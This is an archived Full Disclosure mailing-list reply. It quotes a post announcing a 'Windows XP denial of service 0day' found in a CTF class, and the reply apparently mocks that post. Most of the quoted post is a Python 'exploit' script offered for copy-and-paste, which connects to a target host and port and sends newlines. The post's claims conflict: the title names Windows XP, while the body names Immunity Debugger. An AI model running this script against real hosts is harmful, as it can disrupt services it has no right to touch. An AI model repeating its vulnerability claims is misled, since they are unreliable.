Full Disclosure mailing list archives
Re: Windows XP denial of service 0day found in CTF exercise
From: "Justin C. Klein Keane" <justin () madirish net>
Date: Tue, 17 Apr 2012 08:26:25 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Windows XP denial of service 0day found in CTF exercise
Oof, this is almost as bad as that BackTrack 0 day released the other day (http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/). Any response from Microsoft yet? Justin C. Klein Keane http://www.MadIrish.net The PGP signature on this email can be verified using the public key at http://www.madirish.net/gpgkey On 04/17/2012 02:48 AM, Adam Behnke wrote:
Immunity Debugger Remote Denial of Service 0Day Tested against version 1.76 and 1.80 on Windows XP distributions Has not been tested for potential privilege escalation vectors. We first wrote about Immunity Debugger here: http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/ Discovered by a student that wishes to remain anonymous in the course CTF. This 0day exploit for Windows was discovered by a student in the InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The student wishes to remain anonymous, he has contributed a python version of the 0day. A patch that can be applied to Windows has not been made available. You can find a python version of the exploit to copy and paste here: #!/usr/bin/python #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os import time import getopt import socket
class Error(Exception): def __init__(self, error):
self.errorStr=error def __str__(self): return repr(self.errorStr)
class Exploit():
def __init__(self, targetHost, targetPort): self.targetHost =
targetHost
def exploit(self, targetHost, targetPort):
try: socket.inet_aton(targetHost) s =
socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((targetHost,targetPort)) except socket.error: raise
Error("Unable to exploit (Connect failed.)") sys.exit(0)
# exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
except: raise Error("Unable to exploit (Exploit failed.)")
def usage(): print "[!] Usage:" print " ( -h, --help ):" print "
Print this message." print " ( --targetHost= ): Target host." print
" --targetHost=127.0.0.1" print " ( --targetPort= ): Target
port." print " --targetPort=8888"
def main(): print "[$] Windows XP 0Day" try: opts, args =
getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
"targetPort="]) except getopt.GetoptError, err: # Print help
information and exit: print '[!] Parameter error:' + str(err) #
Will print something like "option -a not recognized" usage()
sys.exit(0)
targetHost=None targetPort=None for opt, arg in opts: if opt in
("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
would be assuming to say we'll never get here. print "[!] Parameter
error." usage() sys.exit(0) if not targetHost: print "[!]
Parameter error: targetHost not set." usage() sys.exit(0)
if not targetPort: print "[!] Parameter error: targetPort not
set." usage() sys.exit(0)
exploit = Exploit(targetHost, targetPort)
print "[*] Attempting to exploit:" try:
exploit.exploit(targetHost, int(targetPort)) except Error as
error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
print "[*] Exploit appears to have worked."
# Standard boilerplate to call the main() function to begin # the
program. if __name__=='__main__': main()
_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iPwEAQECAAYFAk+NYXEACgkQkSlsbLsN1gBiggb/efTTww5szr9rcI+NbsUzybuk rhPyvj99VJMMVCUjHrDrWKXQeTD/rrorY3SYMIGNlHzVWgqkiswM5N16Fy9MvqIH 2Cc8aJ5kh2xi9vtlCHlPZ7XJeN3tPEL+8/qOVbT7I2CNeD8JJseVfcJwnoEyyumm SZYmoxjJriMT7IAXysHJudaF294DvC+z6drvF+ou8wnVcIB0nkXoCVNsbcDK9dwS R4f0a+QYN1tXM7+8za6/VznbDwcqw/amqeS3V883lqlt0XCHx5zIh+VxG0qvB5Ui EPjoh3P/OEMP7PYRozM= =y+j6 -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Windows XP denial of service 0day found in CTF exercise Adam Behnke (Apr 16)
- Re: Windows XP denial of service 0day found in CTF exercise Memory Vandal (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise Romain Bourdy (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise Memory Vandal (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise Mihamina Rakotomandimby (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise Romain Bourdy (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise Memory Vandal (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise Justin C. Klein Keane (Apr 17)
- Message not available
- Re: Windows XP denial of service 0day found in CTF exercise adam (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise Terrence (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise adam (Apr 17)